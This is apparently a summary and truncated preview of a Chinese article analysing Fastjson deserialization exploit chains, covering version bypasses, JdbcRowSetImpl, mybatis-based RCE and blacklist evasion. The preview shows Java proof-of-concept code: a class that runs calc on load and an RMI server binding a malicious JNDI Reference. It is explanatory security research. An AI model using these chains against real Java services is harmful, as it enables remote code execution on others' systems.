Fastjson反序列化利用链分析

主要观点总结

本文介绍了Fastjson反序列化漏洞的详细过程，包括不同版本间的修复与绕过方法，以及利用第三方框架（如mybatis）进行RCE的示例。文章还介绍了一种通用的绕过黑名单的方法，以及针对最新版本的修复策略。

关键观点总结

关键观点1: Fastjson版本漏洞分析

详细介绍了从1.2.24到最新版本的Fastjson在面临攻击时的应对策略和漏洞修复方式。

关键观点2: JdbcRowSetImpl利用链分析

通过详细的步骤和代码，展示了如何利用JdbcRowSetImpl在Fastjson中触发RCE。

关键观点3: 第三方框架RCE示例

通过mybatis框架展示如何利用Fastjson的特性触发RCE。

关键观点4: 通用绕过黑名单方法

介绍了一种通用的绕过Fastjson黑名单的方法，适用于多个版本。

关键观点5: 最新版本修复策略

针对最新版本的Fastjson修复策略进行了介绍和分析。

文章预览

一 实验环境 ◆jdk1.8 ◆windows10 pom依赖 com.alibaba fastjson 1.2.24 先编写一个具有RCE功能的类，和一个工厂类： public class Calc { static { try { Runtime.getRuntime().exec("calc"); } catch (IOException e) { e.printStackTrace(); } } } public class CalcFactory implements ObjectFactory { @Override public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable, ?> environment) throws Exception { return new Calc(); } } 再编写一个简单的RMI服务端： public class RMIServerReference { void register() throws Exception{ LocateRegistry.createRegistry(1099); Reference reference = new Reference("Calc", "CalcFactory", ""); ReferenceWrapper refObjWrapper = new ReferenceWrapper(reference); Naming.bind("rmi://127.0.0.1:1099/Calc", refObjWrapper); System.out.println("RMI se ………………………………